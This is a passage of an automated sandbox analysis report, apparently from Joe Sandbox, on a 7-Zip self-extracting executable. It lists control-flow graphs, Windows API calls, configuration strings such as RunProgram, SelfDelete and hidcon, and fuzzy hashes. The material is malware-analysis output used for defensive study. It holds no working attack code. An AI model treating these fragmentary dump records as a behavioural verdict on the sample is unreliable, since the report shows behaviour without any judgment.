                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00407331
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00407339
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00407341
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00407347
                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 00407380
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 004073AA
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 0040746E
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00407476
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 0040748D
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 004074A1
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 004074A9
                                                                • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 004074C2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@$Message_wtol$lstrlen$??2@wsprintf$CommandCurrentFileFormatLineModuleProcessTimerlstrcpy$?_set_new_handler@@AttributesCallbackCreateDirectoryDispatchDispatcherErrorFolderFreeHandleInitializeKillLastLocalNamePathSizeSpecialStateUserVersionWindowWorkingwvsprintf
                                                                • String ID: " -$$A$0A$0A$0A$123456789ABCDEFGHJKMNPQRSTUVWXYZ$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$7zSfxVarCmdLine0$7zSfxVarCmdLine1$7zSfxVarCmdLine2$7zSfxVarModulePlatform$7zSfxVarSystemLanguage$7zSfxVarSystemPlatform$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$SfxAuthor$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$amd64$bpt$del$forcenowait$hidcon$i386$nowait$pA$setup.exe$sfxconfig$sfxelevation$sfxlang$sfxversion$sfxwaitall$shc$waitall$x64$x86$A$A$A
                                                                • API String ID: 1301190434-1447873201
                                                                • Opcode ID: 7dad82f04e49840a69f33918830f8aa91f68563b6ba8d6d38936dae663f1e458
                                                                • Instruction ID: 37b3d77bb6f8fb102f6eda89de8ddb12e9592f0eac1975534991a7b966549d26
                                                                • Opcode Fuzzy Hash: 7dad82f04e49840a69f33918830f8aa91f68563b6ba8d6d38936dae663f1e458
                                                                • Instruction Fuzzy Hash: 69E2E271904208AADF25AF62DC46AEE3768EF04304F54403BFD06B61D2EB7D9991CB5E

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1094 4039e7-403a0d lstrlenW call 402a67 1097 403a18-403a24 1094->1097 1098 403a0f-403a13 call 4011b7 1094->1098 1100 403a26-403a2a 1097->1100 1101 403a2c-403a32 1097->1101 1098->1097 1100->1101 1102 403a35-403a37 1100->1102 1101->1102 1103 403a5b-403a64 call 401e6b 1102->1103 1106 403a66-403a79 GetSystemTimeAsFileTime GetFileAttributesW 1103->1106 1107 403a4a-403a4c 1103->1107 1108 403a92-403a9b call 401e6b 1106->1108 1109 403a7b-403a89 call 40367d 1106->1109 1110 403a39-403a41 1107->1110 1111 403a4e-403a50 1107->1111 1124 403aac-403aae 1108->1124 1125 403a9d-403aaa call 409606 1108->1125 1109->1108 1123 403a8b-403a8d 1109->1123 1110->1111 1116 403a43-403a47 1110->1116 1112 403a56 1111->1112 1113 403b0a-403b10 1111->1113 1112->1103 1119 403b12-403b1d 1113->1119 1120 403b3a-403b4d call 409606 ??3@YAXPAX@Z 1113->1120 1116->1111 1121 403a49 1116->1121 1119->1120 1126 403b1f-403b23 1119->1126 1135 403b4f-403b53 1120->1135 1121->1107 1130 403b2f-403b38 ??3@YAXPAX@Z 1123->1130 1127 403ab0-403acf memcpy 1124->1127 1128 403afe-403b08 ??3@YAXPAX@Z 1124->1128 1125->1123 1126->1120 1132 403b25-403b2a 1126->1132 1133 403ad1 1127->1133 1134 403ae4-403ae8 1127->1134 1128->1135 1130->1135 1132->1120 1137 403b2c-403b2e 1132->1137 1138 403ae3 1133->1138 1139 403ad3-403adb 1134->1139 1140 403aea-403af7 call 401e6b 1134->1140 1137->1130 1138->1134 1139->1140 1141 403add-403ae1 1139->1141 1140->1125 1144 403af9-403afc 1140->1144 1141->1138 1141->1140 1144->1127 1144->1128
                                                                APIs
                                                                • lstrlenW.KERNEL32(00401A74,00000000,?,?,?,?,?,?,00401A74,?), ref: 004039F4
                                                                • GetSystemTimeAsFileTime.KERNEL32(?,00401A74,?,?,?,?,00401A74,?), ref: 00403A6A
                                                                • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00401A74,?), ref: 00403A71
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00401A74,?,?,?,?,00401A74,?), ref: 00403B30
                                                                  • Part of subcall function 004011B7: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011D7
                                                                  • Part of subcall function 004011B7: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011FD
                                                                • memcpy.MSVCRT(-00000001,00401A74,?,?,?,?,?,00401A74,?), ref: 00403AC2
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00401A74,?), ref: 00403AFF
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00401A74,00401A74,?,?,?,?,00401A74,?), ref: 00403B45
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                                • String ID:
                                                                • API String ID: 846840743-0
                                                                • Opcode ID: 61fbb82b866355ca103b6651924008aad8ffda89ca2a341e34f636fd10af957e
                                                                • Instruction ID: 952cd346550c55d7e35c26256f51fad4d5ed31c9206aabe41908170679320093
                                                                • Opcode Fuzzy Hash: 61fbb82b866355ca103b6651924008aad8ffda89ca2a341e34f636fd10af957e
                                                                • Instruction Fuzzy Hash: 4141E836A00112AADB20AF59C841ABF7B7CEB4170AF50413BEC81B21D1D77D5A4286DD

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1216 40367d-403694 GetFileAttributesW 1217 403696-403698 1216->1217 1218 40369a-40369c 1216->1218 1219 4036f3-4036f5 1217->1219 1220 4036ab-4036b2 1218->1220 1221 40369e-4036a9 SetLastError 1218->1221 1222 4036b4-4036bb call 403650 1220->1222 1223 4036bd-4036c0 1220->1223 1221->1219 1222->1219 1225 4036f0-4036f2 1223->1225 1226 4036c2-4036d3 FindFirstFileW 1223->1226 1225->1219 1226->1222 1228 4036d5-4036ee FindClose CompareFileTime 1226->1228 1228->1222 1228->1225
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 0040368B
                                                                • SetLastError.KERNEL32(00000010), ref: 004036A0
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: AttributesErrorFileLast
                                                                • String ID:
                                                                • API String ID: 1799206407-0
                                                                • Opcode ID: d36faaefddfd81e2762f97a3370e571bf9c3961ee8d128041245bb49f3de1fe9
                                                                • Instruction ID: 2afa7e6ed9b3c4e8b0be6899d5053f20146e769dcf51bfeaf0e83b5e475a48be
                                                                • Opcode Fuzzy Hash: d36faaefddfd81e2762f97a3370e571bf9c3961ee8d128041245bb49f3de1fe9
                                                                • Instruction Fuzzy Hash: 7001AD30402014BEDB206F759C099EA3B5CAF0132AF204E32F822F23D0D739CB469A5E

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 793 401b0b-401b1b 794 401b27-401b52 call 413cbd 793->794 795 401b1d-401b22 793->795 800 401b54 794->800 801 401b65-401b71 call 4014eb 794->801 796 401e65-401e68 795->796 802 401b56-401b60 call 412574 800->802 807 401e47-401e62 ??3@YAXPAX@Z call 412574 801->807 808 401b77-401b7c 801->808 809 401e64 802->809 807->809 808->807 810 401b82-401bb8 call 401403 call 4017c0 call 40143c ??3@YAXPAX@Z 808->810 809->796 820 401e2d-401e30 810->820 821 401bbe-401bdd 810->821 822 401e32-401e45 ??3@YAXPAX@Z call 412574 820->822 825 401bf8-401bfc 821->825 826 401bdf-401bf3 call 412574 ??3@YAXPAX@Z 821->826 822->809 829 401c03-401c08 825->829 830 401bfe-401c01 825->830 826->802 833 401c2a-401c2d 829->833 834 401c0a 829->834 832 401c30-401c47 830->832 832->826 838 401c49-401c6c 832->838 833->832 835 401c0c-401c12 834->835 839 401c14-401c25 call 412574 ??3@YAXPAX@Z 835->839 843 401c87-401c8d 838->843 844 401c6e-401c82 call 412574 ??3@YAXPAX@Z 838->844 839->802 846 401ca9-401cbb GetLocalTime SystemTimeToFileTime 843->846 847 401c8f-401c92 843->847 844->802 850 401cc1-401cc4 846->850 848 401c94-401c96 847->848 849 401c9b-401ca7 847->849 848->835 849->850 852 401cc6-401cd0 call 4039e7 850->852 853 401cdd-401ce4 call 40367d 850->853 852->839 858 401cd6-401cd8 852->858 857 401ce9-401cee 853->857 859 401cf4-401cf7 857->859 860 401e19-401e28 GetLastError 857->860 858->835 861 401cfd-401d07 ??2@YAPAXI@Z 859->861 862 401e0f-401e12 859->862 860->820 864 401d18 861->864 865 401d09-401d16 861->865 862->860 866 401d1a-401d3e call 41334e call 412468 864->866 865->866 871 401df4-401e0d call 4136b9 call 412574 866->871 872 401d44-401d62 GetLastError call 4013d1 call 4033bd 866->872 871->822 881 401d64-401d6b 872->881 882 401d9f-401db4 call 4039e7 872->882 885 401d6f-401d7f ??3@YAXPAX@Z 881->885 886 401dc0-401dd8 call 412468 882->886 887 401db6-401dbe 882->887 888 401d81-401d83 885->888 889 401d87-401d9a call 412574 ??3@YAXPAX@Z 885->889 895 401dda-401de9 GetLastError 886->895 896 401deb-401df3 ??3@YAXPAX@Z 886->896 887->885 888->889 889->802 895->885 896->871
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 55ca3ee3d26e98f30d69d3e888b340bde38f36a0fcd7a85b294178b1590f4b85
                                                                • Instruction ID: f12f3cbfd9e378c4fb4e9f7b852960855991058b71a72fc1bb9c774fc2295476
                                                                • Opcode Fuzzy Hash: 55ca3ee3d26e98f30d69d3e888b340bde38f36a0fcd7a85b294178b1590f4b85
                                                                • Instruction Fuzzy Hash: 2CB18071900204EFCF15EFA5C8849EEB7B5FF44304B20852BF812A72A1DB78E945CB59

                                                                Control-flow Graph

                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402023
                                                                • CreateWindowExW.USER32(00000000,Static,0041A584,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00402040
                                                                • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00402052
                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040205F
                                                                • DispatchMessageW.USER32(?), ref: 00402069
                                                                • KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402072
                                                                • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402079
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                                                • String ID: Static
                                                                • API String ID: 2479445380-2272013587
                                                                • Opcode ID: 947087521f2d8a527adb1e132fdb1a2ab70df0e469f5237fcb2ff151bfac6e68
                                                                • Instruction ID: 2d78b022e2fbb31551ae1a24c66cabd830678dfcab2333de03de12e069c17b52
                                                                • Opcode Fuzzy Hash: 947087521f2d8a527adb1e132fdb1a2ab70df0e469f5237fcb2ff151bfac6e68
                                                                • Instruction Fuzzy Hash: 2BF062325472217BCA312BA69C4DEEF3E2DEF46BB1F004260F619A11D1DAB94111C6BA

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 901 414491-4144ac call 416606 904 4144bb-4144f9 call 407613 call 4136b9 901->904 905 4144ae-4144b8 901->905 910 4145c7-4145ed call 41424b call 414186 904->910 911 4144ff-414509 ??2@YAPAXI@Z 904->911 921 41460b-414623 call 4127e6 call 413cbd 910->921 922 4145ef-414605 call 413d98 910->922 912 414518 911->912 913 41450b-414516 911->913 916 41451a-414553 call 41334e ??2@YAPAXI@Z 912->916 913->916 923 414565 916->923 924 414555-414563 916->924 938 414625-414632 ??2@YAPAXI@Z 921->938 939 41465b-41466b 921->939 922->921 932 414787-41479e 922->932 925 414567-4145a0 call 41334e call 410320 call 414020 923->925 924->925 953 4145a2-4145a4 925->953 954 4145a8-4145ad 925->954 941 414a14-414a2f call 413d2a 932->941 942 4147a4 932->942 943 414634-41463b call 414270 938->943 944 41463d 938->944 955 41469b-4146a1 939->955 956 41466d 939->956 961 414a31-414a37 941->961 962 414a3a-414a3d 941->962 949 4147a7-4147da 942->949 945 41463f-41464f call 4136b9 943->945 944->945 967 414651-414654 945->967 968 414656 945->968 973 414810-414828 949->973 974 4147dc-4147e5 949->974 953->954 964 4145b5-4145c1 954->964 965 4145af-4145b1 954->965 959 414775-414784 call 414419 955->959 960 4146a7-4146c7 call 412958 955->960 963 41466f-414695 call 412885 call 413d75 call 413edc call 413f0e 956->963 959->932 977 4146cc-4146d4 960->977 961->962 962->963 971 414a43-414a6a call 41271d 962->971 963->955 964->910 964->911 965->964 975 414658 967->975 968->975 994 414a82-414a9e 971->994 995 414a6c-414a80 call 416407 971->995 990 4148e2-414925 call 41271d * 2 973->990 991 41482e-414833 973->991 980 4147eb-414800 974->980 981 41497f-414981 974->981 975->939 983 414949-41494e 977->983 984 4146da-4146e1 977->984 998 414ab1-414ab3 980->998 999 414806-414808 980->999 997 414985-41498a 981->997 988 414950-414952 983->988 989 414956-41495b 983->989 992 4146e3-4146e7 984->992 993 41470f-414712 984->993 988->989 1002 414963-414966 989->1002 1003 41495d-41495f 989->1003 1036 414927-41492a 990->1036 1037 41498f 990->1037 1004 414ac3-414ac5 991->1004 1005 414839-41484a 991->1005 992->993 1007 4146e9-4146ec 992->1007 1000 414978-41497d 993->1000 1001 414718-414726 call 4136b9 993->1001 1091 414a9f call 418583 994->1091 1092 414a9f call 413bea 994->1092 1093 414a9f call 402a2f 994->1093 995->994 997->963 1012 414ab5-414ab7 998->1012 1013 414abb-414abe 998->1013 999->973 1017 41480a-41480c 999->1017 1000->981 1000->997 1032 414733-414744 call 414020 1001->1032 1033 414728-41472e call 418e03 1001->1033 1002->963 1003->1002 1022 414ac9-414ace 1004->1022 1034 414850-414882 call 402a67 call 40b2b0 1005->1034 1035 414ad3-414ae1 SysFreeString 1005->1035 1015 4146f2-414700 call 4136b9 1007->1015 1016 41496b-414970 1007->1016 1011 414aa2-414aac call 412885 1011->963 1012->1013 1013->963 1015->1032 1040 414702-41470d call 418dde 1015->1040 1016->997 1026 414972-414974 1016->1026 1017->973 1022->963 1026->1000 1053 414746-414748 1032->1053 1054 41474c-414751 1032->1054 1033->1032 1063 414884-41488a 1034->1063 1064 41489a-4148b8 ??3@YAXPAX@Z 1034->1064 1038 414ae3-414ae5 1035->1038 1039 414ae9-414aeb 1035->1039 1045 41492d-414945 call 416407 1036->1045 1044 414992-414997 1037->1044 1038->1039 1039->963 1040->1032 1049 414999-4149a5 call 413fb1 1044->1049 1050 4149df-414a0b call 412885 * 2 1044->1050 1067 414947 1045->1067 1069 4149b3-4149bf call 413ffc 1049->1069 1070 4149a7-4149b1 1049->1070 1050->949 1087 414a11 1050->1087 1053->1054 1058 414753-414755 1054->1058 1059 414759-41475e 1054->1059 1058->1059 1061 414760-414762 1059->1061 1062 414766-41476f 1059->1062 1061->1062 1062->959 1062->960 1068 41488c-414898 1063->1068 1076 414af0-414af7 ??3@YAXPAX@Z 1064->1076 1077 4148be-4148da ??3@YAXPAX@Z SysFreeString 1064->1077 1067->1044 1068->1064 1068->1068 1082 4149c5 1069->1082 1083 414af9-414b09 call 412885 * 2 1069->1083 1073 4149c8-4149dd call 416407 1070->1073 1073->1049 1073->1050 1076->1035 1077->990 1081 4148dc-4148de 1077->1081 1081->990 1082->1073 1083->1022 1087->941 1091->1011 1092->1011 1093->1011
                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,?,00000000,?), ref: 00414501
                                                                • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,00000000,?,00000000,?), ref: 0041454B
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??2@
                                                                • String ID:
                                                                • API String ID: 1033339047-0
                                                                • Opcode ID: 8c275e2cc856adcccae56b2b03b23110c5135f8455b1c708b9d72e7dbd912df9
                                                                • Instruction ID: b54dbc60db56bc1e6d6afd4c66008574e1cbac59b919e387d83e05da41c529ad
                                                                • Opcode Fuzzy Hash: 8c275e2cc856adcccae56b2b03b23110c5135f8455b1c708b9d72e7dbd912df9
                                                                • Instruction Fuzzy Hash: 89321271900249DFCB14DFA5C8848EEBBB5BF88308B14456EF9169B351CB39E985CF98

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1145 4053b2-4053f7 call 4014eb * 2 memset 1150 405403-405407 1145->1150 1151 4053f9-4053fc 1145->1151 1152 405410-40542a call 404e9f call 401403 1150->1152 1153 405409 1150->1153 1151->1150 1158 405445-40545d ShellExecuteExW 1152->1158 1159 40542c-405434 ??3@YAXPAX@Z 1152->1159 1153->1152 1161 405485-405487 1158->1161 1162 40545f-405466 1158->1162 1160 405437-405444 ??3@YAXPAX@Z 1159->1160 1163 40547c-405483 ??3@YAXPAX@Z 1161->1163 1164 405473-405476 CloseHandle 1162->1164 1165 405468-40546d WaitForSingleObject 1162->1165 1163->1160 1164->1163 1165->1164
                                                                APIs
                                                                • memset.MSVCRT ref: 004053D6
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?), ref: 0040542F
                                                                • ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00405437
                                                                • ShellExecuteExW.SHELL32(?), ref: 00405455
                                                                • WaitForSingleObject.KERNEL32(004071CC,000000FF), ref: 0040546D
                                                                • CloseHandle.KERNEL32(004071CC), ref: 00405476
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040547D
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@$CloseExecuteHandleObjectShellSingleWaitmemset
                                                                • String ID:
                                                                • API String ID: 2700081640-0
                                                                • Opcode ID: a85339e1bd803a9382c8719e0269a721a92dd258667116cddf8bfe46f874b10c
                                                                • Instruction ID: a17db50f12ff5cb4ace43bc03755f74cf1bf378a7c310b81d7eb3e61b1d8450d
                                                                • Opcode Fuzzy Hash: a85339e1bd803a9382c8719e0269a721a92dd258667116cddf8bfe46f874b10c
                                                                • Instruction Fuzzy Hash: 3D212B71804208ABDB119FD5D885AEFBBB8EF44319F10812BE915B61A1D7785985CF84

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1166 401e6b-401e7a CreateDirectoryW 1167 401eac-401eb0 1166->1167 1168 401e7c-401e89 GetLastError 1166->1168 1169 401e96-401ea3 GetFileAttributesW 1168->1169 1170 401e8b 1168->1170 1169->1167 1172 401ea5-401ea7 1169->1172 1171 401e8c-401e95 SetLastError 1170->1171 1172->1167 1173 401ea9-401eaa 1172->1173 1173->1171
                                                                APIs
                                                                • CreateDirectoryW.KERNELBASE(a:@,00000000,-00000001,00403A61,?,00401A74,?,?,?,?,00401A74,?), ref: 00401E72
                                                                • GetLastError.KERNEL32(?,?,?,?,00401A74,?), ref: 00401E7C
                                                                • SetLastError.KERNEL32(000000B7,?,?,?,?,00401A74,?), ref: 00401E8C
                                                                • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00401A74,?), ref: 00401E9A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                • String ID: a:@
                                                                • API String ID: 635176117-3844204524
                                                                • Opcode ID: 2870007de936e2cd6bf86a77b59755239ded30d6049a6d438da8b23bd184778b
                                                                • Instruction ID: 62bb911204df67689409a0bf299a5fa733f048eefc6419992ca9e78119752425
                                                                • Opcode Fuzzy Hash: 2870007de936e2cd6bf86a77b59755239ded30d6049a6d438da8b23bd184778b
                                                                • Instruction Fuzzy Hash: 0CE09A3494A210BFEB212B24FC087DF3B549F01321F608A36FC19E21F0C3388852868A

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1174 402665-402684 LoadLibraryA GetProcAddress 1175 402692-402695 1174->1175 1176 402686-402691 GetNativeSystemInfo 1174->1176
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 00402675
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040267C
                                                                • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 0040268A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: AddressInfoLibraryLoadNativeProcSystem
                                                                • String ID: GetNativeSystemInfo$kernel32
                                                                • API String ID: 2103483237-3846845290
                                                                • Opcode ID: 19664b54b855b72bcbaa716dd824881a6f451c3f2b4ed8b8d333fe071d6dfa80
                                                                • Instruction ID: 08739c12cb3b948957cf2c0406c7fd7347f4194bf9f07d28511d247575205d7a
                                                                • Opcode Fuzzy Hash: 19664b54b855b72bcbaa716dd824881a6f451c3f2b4ed8b8d333fe071d6dfa80
                                                                • Instruction Fuzzy Hash: AAD05EB0A0520576CB00ABB15D0E9EB7AEC5A48608B144461A806F00C5EAADDD90C36A

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
